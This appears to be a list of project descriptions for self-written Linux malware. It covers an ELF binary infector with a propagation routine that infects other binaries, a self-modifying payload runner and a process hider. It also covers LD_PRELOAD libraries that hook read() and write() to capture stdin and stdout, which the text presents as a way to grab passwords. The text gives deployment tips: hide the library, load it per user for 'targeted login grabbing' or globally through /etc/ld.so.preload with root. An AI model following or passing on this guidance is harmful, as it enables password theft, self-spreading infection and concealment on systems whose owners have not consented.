For giggles I took the fasm elf injection stub from kspalaiologos, and rewrote it in C, then added a function which badly checks if a binary is infected, and made a propergate function which will infect arbitrary binaries if it has permission to do so, as long as allowed by the aggressiveness value
Last time I tried making a self modifing program I got shot down all over the place because of security measures and overly complex functions needed to make .text writable, this time I made a program which will inject a negated payload in a copy of its own elf which is stored as a mem_fd and execve it.
Basically the same concept as Selfmod but instead of storing the payload inside .data, the makefile instead dd's the negated payload into the payload function leaving padding for a condition which will make the negated payload not get executed(as that wouldn't work), and in the copy the codition will be removed and the payload will be found and negated.
Inspired by a process hider library which overwrites the readddir dynamic libc function, this library hooks the read() function(which is used by 90% of all terminal password prompts) and dumps all buffer contents which are from stdin(fd 0), into HOOK_FILE
All you need to do is have it hidden somewhere and you can force it using either the LD_PRELOAD env var, which is practical for targeted login grabbing, or you can use /etc/ld.so.preload for a global stdin poisoning(this requires root), this does have one downside, LD_PRELOAD is ignored by suid binaries
The exact same but for the write syscall capturing stdout and stderr
More efficient and minimal implementation of the before mentioned processhider preload library